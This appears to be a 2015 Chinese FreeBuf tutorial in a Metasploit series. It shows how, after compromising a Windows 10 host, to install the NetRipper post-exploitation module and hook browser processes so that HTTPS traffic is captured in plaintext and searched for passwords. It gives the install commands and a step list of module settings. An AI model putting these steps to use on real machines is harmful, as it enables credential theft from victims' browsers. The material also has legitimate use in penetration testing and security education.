freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
FreeBuf+小程序

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

玩转metasploit系列(第八集) 金币
2015-10-26 13:58:49

距离上次的msf教程间隔有些久远,大家见谅~

在拿到一台主机的权限后,我们可能需要监听对方的整个网络活动。其中浏览器自然不可少。其中http的数据包还好,但是一旦遇到https就头大了。今天要说的是用netripper对浏览进程进行监听从而绕过https加密。有些人可能会说怎么不用键盘记录。键盘记录记录的垃圾信息太多,筛选费时。

实际上这个方法也是一个俄罗斯黑客告诉我的,最近和他做各种安全实验。

Kali系统的IP地址:

Win10系统的IP地址:

0x01:生成payload

因为我的是win10系统,所以先用Veil生成一个payload,然后复制到windows系统上先运行。至于为什么不用msfvenom,因为msfvenom生产的payload在win10上运行不了。生成的过程不再重复,之前已经说过了。不懂的可以看我之前的文章。

好的,证明连接没什么问题了。

0x02:安装netripper

Netripper属于一个后渗透模块,也叫做POST模块。属于后期渗透的基本组件。在metasploit上是没有这个模块的,需要下载安装。

官网上的命令有点问题,我做了点修改。

cd /home
git clone https://github.com/NytroRST/NetRipper.git
cd /home/NetRipper/Metasploit/
cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
g++ -Wall netripper.cpp -o netripper
cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
cd ../Release
cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

0x03:设置工作

先进入到Veil的handler目录,开启postgresql数据库,监听目标IP。

会话连接成功:

先查看系统的进程,这个在后面设置的时候很重要。

现在进入netripper:

看到没,第二部分就是设置进程的名称,当然,你也可以直接设置进程的ID。(PS:这个截图的时候set VERBOSE ture 应该是set VERBOSE true,不注意给拼错了。)最后再设置保存的文件。

这里给大家整理一下。

1. 拿到shell后使用PS命令查看主机进程。
2. 之后进入netripper模块
3. set VERBOSE true
4. set SESSION (这里写Active sessions的ID)
5. set DATAPATH(选择要保存文件的路径,这里是对方系统的路径,不是你的路径)
6. set PROCESSNAMES 或者 PROCESSIDS (就是你之前查看的系统进程,看你是想对进程的ID还是名称进行监听。)
7. run

实际操作的时候出错了,这时突然想起在freebuf看到的一篇文章

我的谷歌浏览器是最新版本的。。。难怪说不能,我还以为是权限问题。原来我想多了。那么换还火狐吧。

先拿freebuf开刀吧。随便输入一串密码。

找到Write.txt,复制到桌面上打开,搜索pass,password,username之类的关键字

然后就成功啦~~

*‍‍ 作者/Arthur,整理/FreeBuf小编banish,应作者要求,未经允许禁止转载!

本文作者:, 转载请注明来自FreeBuf.COM

# Metasploit
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦